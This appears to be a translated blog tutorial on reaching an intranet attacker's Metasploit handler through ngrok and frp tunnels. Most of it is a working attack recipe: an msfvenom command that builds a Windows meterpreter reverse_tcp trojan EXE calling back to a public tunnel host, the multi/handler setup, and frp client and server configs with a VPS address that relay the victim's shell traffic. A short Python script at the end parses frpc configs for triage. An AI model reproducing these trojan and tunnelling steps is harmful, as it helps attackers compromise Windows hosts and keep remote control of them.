Kali intranet penetration shell
2022-06-09 16:30:00 【amingMM】
Intranet penetration article
Reverse shell through an ngrok tunnel
0.0 Register an account on the ngrok intranet tunneling platform and open a free tunnel
Website: https://www.ngrok.cc

e.g. 192.168.254.128 is my intranet IP




0x01 Download and install the tunneling client
Address: https://www.ngrok.cc/sunny/linux_amd64.zip?v=2.1

unzip
./sunny clientid <tunnel id>


0x02 Generating the Trojan with msfvenom
Kali command to generate the EXE Trojan file:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp://free.idcfengye.com LPORT=10206 -f exe -o /home/amingmm/Desktop/puty.exe

0x03 Start msf and configure the exploit module
use exploit/multi/handler
0x04 Select the attack payload and go online
set payload windows/meterpreter/reverse_tcp

set
run/exploit

Using frp to forward meterpreter from the network to the local msf
Download: https://github.com/fatedier/frp/releases
Unzip it.
● frpc configuration on the Kali side
[common]
server_addr = 121.5.64.200 # VPS address
server_port = 2580 # VPS listening port
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 12580 # msf payload listening port (i.e. the listening port of the intranet host)
remote_port = 6666 # VPS traffic forwarding port (traffic egress, the payload port)
● Server-side frps configuration
[common]
bind_port = 2580 # server listening port
./frps -c frps.ini (or ./frpc -c frpc.ini) starts the server (or the client)
systemctl start frps
systemctl restart frps
systemctl stop frps
● frp connection process
frps opens two listening ports <---- the intranet client frpc opens a TCP connection to the VPS
VPS – intranet host connection established (connection 1 established)
● Process of the compromised host coming online
The payload creates a process and actively connects to vps:<payload port>
Tunnel traffic forwarding: traffic arriving on the payload port is sent as packets over the TCP connection to the Kali side on the intranet
● Process on the Kali side
The frpc client on the Kali side forwards the traffic through the tunnel to the msf handler --> listening port
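For triage, the forwarding path described above can be read directly out of an frpc.ini found on a host. The following is an added example, not part of the original post: the function names and the HIGH/INFO labels are assumptions of the example, and Python's configparser stands in for frp's own INI parser.

```python
import configparser

# Sample input: the frpc.ini values shown on this page, with comments shortened.
SAMPLE_FRPC_INI = """\
[common]
server_addr = 121.5.64.200 # VPS address
server_port = 2580 # VPS listening port
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 12580 # local listener
remote_port = 6666 # port exposed on the VPS
"""

def parse_frpc(text):
    """Return ((server_addr, server_port), [proxy, ...]) from frpc INI text."""
    # Inline '#' comments (preceded by whitespace) are stripped from values.
    cp = configparser.ConfigParser(inline_comment_prefixes=("#", ";"),
                                   interpolation=None)
    cp.read_string(text)
    if not cp.has_section("common"):
        raise ValueError("not an frpc config: no [common] section")
    common = cp["common"]
    server = (common.get("server_addr"), common.getint("server_port", fallback=None))
    proxies = []
    for name in cp.sections():
        if name == "common":
            continue  # every other section defines one forwarded service
        sec = cp[name]
        proxies.append({
            "name": name,
            "type": sec.get("type"),
            "local": (sec.get("local_ip"), sec.getint("local_port", fallback=None)),
            "remote_port": sec.getint("remote_port", fallback=None),
        })
    return server, proxies

def findings(text):
    """One line per proxy: which external port reaches which local listener."""
    (addr, port), proxies = parse_frpc(text)
    out = []
    for p in proxies:
        lip, lport = p["local"]
        # Example triage label: a raw TCP/UDP port published on the remote server.
        sev = "HIGH" if p["type"] in ("tcp", "udp") and p["remote_port"] else "INFO"
        out.append(f"[{sev}] proxy '{p['name']}': {addr}:{p['remote_port']} -> "
                   f"tunnel via {addr}:{port} -> {lip}:{lport} ({p['type']})")
    return out

if __name__ == "__main__":
    print("\n".join(findings(SAMPLE_FRPC_INI)))
```

Each reported line gives three things to check in network logs: the outbound control connection to server_addr:server_port, the published remote port, and the local listener that receives the forwarded traffic.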

